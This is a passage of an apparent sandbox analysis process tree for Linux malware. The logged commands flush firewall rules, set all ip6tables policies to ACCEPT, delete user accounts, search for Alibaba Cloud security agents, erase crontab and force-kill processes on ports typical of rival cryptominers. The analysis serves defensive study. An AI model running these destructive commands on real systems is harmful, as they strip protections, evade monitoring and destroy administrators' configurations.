                                                                                                                                                                                                                                                                                                                      PID:1695
                                                                                                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                      ip6tables -Z ufw6-before-logging-forward
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                        PID:1696
                                                                                                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                        ip6tables -Z ufw6-track-forward
                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                          PID:1697
                                                                                                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                          ip6tables -Z ufw6-track-output
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                            PID:1698
                                                                                                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                            ip6tables -Z ufw6-track-input
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                              PID:1699
                                                                                                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                              ip6tables -Z ufw6-skip-to-policy-output
                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                PID:1700
                                                                                                                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                ip6tables -Z ufw6-reject-output
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                  PID:1701
                                                                                                                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                  ip6tables -Z ufw6-after-logging-output
                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                    PID:1702
                                                                                                                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                    ip6tables -Z ufw6-after-output
                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                      PID:1703
                                                                                                                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                      ip6tables -Z ufw6-user-logging-output
                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                        PID:1704
                                                                                                                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                        ip6tables -Z ufw6-user-output
                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                          PID:1705
                                                                                                                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                          ip6tables -Z ufw6-before-output
                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                            PID:1706
                                                                                                                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                            ip6tables -Z ufw6-before-logging-output
                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                              PID:1707
                                                                                                                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                              ip6tables -X ufw6-logging-deny
                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                PID:1708
                                                                                                                                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                ip6tables -X ufw6-logging-allow
                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1709
                                                                                                                                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                  ip6tables -X ufw6-not-local
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                    PID:1710
                                                                                                                                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                    ip6tables -X ufw6-user-logging-input
                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                      PID:1711
                                                                                                                                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                      ip6tables -X ufw6-user-logging-output
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                        PID:1712
                                                                                                                                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                        ip6tables -X ufw6-user-logging-forward
                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                          PID:1713
                                                                                                                                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                          ip6tables -X ufw6-user-limit-accept
                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                            PID:1714
                                                                                                                                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                            ip6tables -X ufw6-user-limit
                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                              PID:1715
                                                                                                                                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                              ip6tables -X ufw6-user-input
                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                PID:1716
                                                                                                                                                                                                                                                                                                                                                              • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                                ip6tables -X ufw6-user-forward
                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:1717
                                                                                                                                                                                                                                                                                                                                                                • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                                  ip6tables -X ufw6-user-output
                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:1718
                                                                                                                                                                                                                                                                                                                                                                  • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                                    ip6tables -X ufw6-skip-to-policy-input
                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:1719
                                                                                                                                                                                                                                                                                                                                                                    • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                                      ip6tables -X ufw6-skip-to-policy-output
                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:1720
                                                                                                                                                                                                                                                                                                                                                                      • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                                        ip6tables -X ufw6-skip-to-policy-forward
                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1721
                                                                                                                                                                                                                                                                                                                                                                        • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                                          ip6tables -P INPUT ACCEPT
                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:1722
                                                                                                                                                                                                                                                                                                                                                                          • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                                            ip6tables -P OUTPUT ACCEPT
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:1723
                                                                                                                                                                                                                                                                                                                                                                            • /sbin/ip6tables
                                                                                                                                                                                                                                                                                                                                                                              ip6tables -P FORWARD ACCEPT
                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:1724
                                                                                                                                                                                                                                                                                                                                                                          • /sbin/iptables
                                                                                                                                                                                                                                                                                                                                                                            iptables -F
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                            • Flushes firewall rules
                                                                                                                                                                                                                                                                                                                                                                            PID:1725
                                                                                                                                                                                                                                                                                                                                                                          • /usr/sbin/userdel
                                                                                                                                                                                                                                                                                                                                                                            userdel akay
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:1726
                                                                                                                                                                                                                                                                                                                                                                            • /usr/sbin/userdel
                                                                                                                                                                                                                                                                                                                                                                              userdel vfinder
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:1730
                                                                                                                                                                                                                                                                                                                                                                              • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                grep -i "[a]liyun"
                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:1735
                                                                                                                                                                                                                                                                                                                                                                                • /bin/ps
                                                                                                                                                                                                                                                                                                                                                                                  ps aux
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                  PID:1731
                                                                                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                  grep -i "[y]unjing"
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:1737
                                                                                                                                                                                                                                                                                                                                                                                  • /bin/ps
                                                                                                                                                                                                                                                                                                                                                                                    ps aux
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                    • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                    PID:1736
                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                    crontab -r
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:1738
                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                      xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:1744
                                                                                                                                                                                                                                                                                                                                                                                      • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                        grep -v -
                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:1743
                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                          awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:1742
                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                            awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:1741
                                                                                                                                                                                                                                                                                                                                                                                            • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                              grep :143
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:1740
                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:1750
                                                                                                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                  grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:1749
                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                    awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:1748
                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                      awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:1747
                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                        grep :2222
                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:1746
                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                          xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:1756
                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                            grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:1755
                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                              awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:1754
                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1753
                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                  grep :3333
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1752
                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                    xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1762
                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                      grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1761
                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                        awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1760
                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                          awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1759
                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                            grep :3389
                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1758
                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                              xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1768
                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1767
                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                  awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1766
                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                    awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1765
                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                      grep :4444
                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1764
                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                        xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1774
                                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                          grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1773
                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                            awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1772
                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                              awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1771
                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                              grep :5555
                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1770
                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1780
                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                  grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1779
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                    awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1778
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                      awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1777
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                        grep :6666
                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1776
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                          xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1786
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                            grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1785
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                              awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1784
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1783
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  grep :6665
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1782
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1791
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1790
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1789
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            grep :6667
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1788
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1798
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1797
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1795
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      grep :7777
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1794
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1804
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1803
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1802
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1801
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                grep :8444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1810
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1809
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1808
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1807
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          grep :3347
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1806
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1815
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1814
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1813
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    grep :14444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1812
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1822
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1821
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1819
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              grep :14433
